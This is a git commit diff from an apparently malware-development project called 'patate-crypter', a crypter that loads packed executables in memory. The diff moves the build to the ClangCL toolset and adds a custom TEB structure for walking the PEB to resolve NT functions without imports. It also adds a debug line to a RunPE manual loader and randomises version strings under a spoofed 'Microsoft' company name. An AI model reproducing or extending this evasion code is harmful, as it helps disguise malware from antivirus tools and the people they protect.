add: clang integration

2024-09-24 17:14:30 +02:00
parent 15c8e787e2
commit 644be7fb11
4 changed files with 27 additions and 12 deletions
--- a/Crypter/config.h
+++ b/Crypter/config.h
@@ -1,2 +1,2 @@
 #pragma once
-#define KEY "ougoqugduzqd"
+#define KEY ""
--- a/Crypter/main.cpp
+++ b/Crypter/main.cpp
@@ -1,3 +1,5 @@
+typedef struct IUnknown IUnknown;
+
 #include <windows.h>
 #include <cstdio>
 #include <iostream>
@@ -91,13 +93,25 @@ typedef NTSTATUS (NTAPI *NtAllocateVirtualMemoryPtr)(HANDLE ProcessHandle, PVOID
 typedef NTSTATUS (NTAPI *LdrLoadDllPtr)(PWCHAR, ULONG, PUNICODE_STRING, PHANDLE);
 typedef NTSTATUS (NTAPI *RtlInitUnicodeStringPtr)(PUNICODE_STRING DestinationString, PCWSTR SourceString);

+typedef struct __TEB {
+    PVOID Reserved1[12];
+    PPEB  ProcessEnvironmentBlock;
+    PVOID Reserved2[399];
+    BYTE  Reserved3[1952];
+    PVOID TlsSlots[64];
+    BYTE  Reserved4[8];
+    PVOID Reserved5[26];
+    PVOID ReservedForOle;
+    PVOID Reserved6[4];
+    PVOID TlsExpansionSlots;
+} TEB_, * PTEB_;

 void* get_ntfunction(const char* func) {
    //START
 #ifdef _M_X64
-    PTEB tebPtr = reinterpret_cast<PTEB>(__readgsqword(reinterpret_cast<DWORD_PTR>(&static_cast<NT_TIB*>(nullptr)->Self)));
+    PTEB_ tebPtr = reinterpret_cast<PTEB_>(__readgsqword(reinterpret_cast<DWORD_PTR>(&static_cast<NT_TIB*>(nullptr)->Self)));
 #else
-    PTEB tebPtr = reinterpret_cast<PTEB>(__readfsdword(reinterpret_cast<DWORD_PTR>(&static_cast<NT_TIB*>(nullptr)->Self)));
+    PTEB_ tebPtr = reinterpret_cast<PTEB_>(__readfsdword(reinterpret_cast<DWORD_PTR>(&static_cast<NT_TIB*>(nullptr)->Self)));
 #endif
    
    PPEB_LDR_DATA ldrData = tebPtr->ProcessEnvironmentBlock->Ldr;
@@ -154,6 +168,7 @@ HMODULE RunPE(const void* dll_buffer, size_t dll_size, DWORD newBase)
        return NULL;
    }

+    DEBUG_PRINTF("[+] Allocated memory at 0x%p\n", image_base);
    const IMAGE_SECTION_HEADER* section_headers = reinterpret_cast<const IMAGE_SECTION_HEADER*>(nt_headers + 1);
    // Copy the section data to the allocated memory.
    for (WORD i = 0; i < nt_headers->FileHeader.NumberOfSections; ++i) {
--- a/Crypter/patate-crypter.rc
+++ b/Crypter/patate-crypter.rc
@@ -68,12 +68,12 @@ BEGIN
        BLOCK "040c04b0"
        BEGIN
 			VALUE "CompanyName", "Microsoft"
-			VALUE "FileDescription", "cixctkirmfubayfzkbog"
+			VALUE "FileDescription", "dnsfzllrjwhkcwdfijbb"
 			VALUE "FileVersion", "1.0.0.1"
-			VALUE "InternalName", "bcjphkt.exe"
+			VALUE "InternalName", "fbjriet.exe"
 			VALUE "LegalCopyright", "Copyright (C) 2023"
-			VALUE "OriginalFilename", "nybxftw.exe"
-			VALUE "ProductName", "txwfqte.exe"
+			VALUE "OriginalFilename", "pvgcwpf.exe"
+			VALUE "ProductName", "wisjfvx.exe"
            VALUE "ProductVersion", "1.0.0.1"
        END
    END
@@ -83,7 +83,7 @@ BEGIN
    END
 END

-MAINICON ICON "C:/Users/patate/Desktop/Programmation/C++/Maldev/patate-crypter/icon.ico"
+//MAINICON ICON ""
 #endif
 /////////////////////////////////////////////////////////////////////////////

--- a/Crypter/patate-crypter.vcxproj
+++ b/Crypter/patate-crypter.vcxproj
@@ -29,26 +29,26 @@
  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
    <ConfigurationType>Application</ConfigurationType>
    <UseDebugLibraries>true</UseDebugLibraries>
-    <PlatformToolset>v143</PlatformToolset>
+    <PlatformToolset>ClangCL</PlatformToolset>
    <CharacterSet>MultiByte</CharacterSet>
  </PropertyGroup>
  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
    <ConfigurationType>Application</ConfigurationType>
    <UseDebugLibraries>false</UseDebugLibraries>
-    <PlatformToolset>v143</PlatformToolset>
+    <PlatformToolset>ClangCL</PlatformToolset>
    <WholeProgramOptimization>false</WholeProgramOptimization>
    <CharacterSet>MultiByte</CharacterSet>
  </PropertyGroup>
  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
    <ConfigurationType>Application</ConfigurationType>
    <UseDebugLibraries>true</UseDebugLibraries>
-    <PlatformToolset>v143</PlatformToolset>
+    <PlatformToolset>ClangCL</PlatformToolset>
    <CharacterSet>MultiByte</CharacterSet>
  </PropertyGroup>
  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
    <ConfigurationType>Application</ConfigurationType>
    <UseDebugLibraries>false</UseDebugLibraries>
-    <PlatformToolset>v143</PlatformToolset>
+    <PlatformToolset>ClangCL</PlatformToolset>
    <WholeProgramOptimization>false</WholeProgramOptimization>
    <CharacterSet>MultiByte</CharacterSet>
  </PropertyGroup>